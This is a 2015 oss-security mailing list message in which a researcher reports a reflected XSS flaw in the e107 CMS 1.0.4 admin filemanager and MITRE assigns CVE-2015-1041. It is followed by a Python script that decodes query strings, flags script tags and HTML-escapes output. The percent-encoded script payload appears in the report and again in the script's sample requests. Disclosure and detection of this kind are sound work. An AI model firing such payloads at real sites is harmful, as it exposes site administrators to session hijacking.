Date: Sun, 11 Jan 2015 09:47:55 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE Request -- CMS e107 v.1.0.4 -- Reflecting XSS vulnerability in filemanager functionality


> Hi Josh, Steve, vendors, list.
>
> I found a reflecting XSS vulnerability in the filemanager functionality in
> the administrative backend of CMS e107 v.1.0.4.
>
> It can be exploited by an attacker like in the following example:
>
> http://{TARGET}/e107_admin/filemanager.php?e107_files/%3C%73%63%72%69%70%74%3Ealert(String.fromCharCode(34, 88, 83, 83, 34))%3C%2F%73%63%72%69%70%74%3E%3C!--%3C%2F%73%63%72%69%70%74%3E%3C!--
>
> Could you please assign a CVE-ID for it?
>
> Thank you!
>
> Greetings.
>
> Steffen Rösemann
>
> References:
>
> [1] http://e107.org/
> [2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-05.html
> [3] https://github.com/e107inc/e107v1/issues/2
> [4] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-05.html
> [5] http://seclists.org/fulldisclosure/2015/Jan/18

Use CVE-2015-1041.

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
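The report above relies on percent-encoding `<script>` inside the query string so the raw request does not visibly contain a tag. The following is an added example, not code from the reporter, MITRE or the e107 project: it percent-decodes request lines (including double-encoded variants, which goes beyond the single encoding shown above), flags those that decode to a script tag, and shows the HTML output encoding that a page must apply before reflecting such a parameter. The request lines are constructed samples modelled on the advisory's URL, with a placeholder host.

```python
"""Decode-then-inspect check for reflected-XSS payloads in query strings."""
import html
import re
from urllib.parse import unquote

# Constructed sample request lines (not real traffic); the second one
# carries the percent-encoded payload quoted in the advisory.
SAMPLE_REQUESTS = [
    "GET /e107_admin/filemanager.php?e107_files/images HTTP/1.1",
    "GET /e107_admin/filemanager.php?e107_files/%3C%73%63%72%69%70%74%3E"
    "alert(String.fromCharCode(34,88,83,83,34))%3C%2F%73%63%72%69%70%74%3E"
    "%3C!--%3C%2F%73%63%72%69%70%74%3E%3C!-- HTTP/1.1",
    # Double-encoded variant: %25 is '%', so it decodes to <script> only
    # after a second pass.
    "GET /e107_admin/filemanager.php?e107_files/%253Cscript%253E HTTP/1.1",
]

# Opening or closing script tag, tolerant of whitespace and case.
SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoding collapses too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_of(request_line: str) -> str:
    """Return the query part of a 'GET <target> HTTP/x' line ('' if none)."""
    target = request_line.split(" ")[1]
    return target.partition("?")[2]


def flag_script_injection(request_lines):
    """Return the decoded query strings that contain a script tag."""
    return [
        normalize(query_of(line))
        for line in request_lines
        if SCRIPT_TAG_RE.search(normalize(query_of(line)))
    ]


def safe_reflect(param: str) -> str:
    """HTML-encode the decoded value so a browser renders it as text, not markup."""
    return html.escape(normalize(param), quote=True)


if __name__ == "__main__":
    for hit in flag_script_injection(SAMPLE_REQUESTS):
        print("flagged:", hit)
        print("encoded:", safe_reflect(hit))
```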
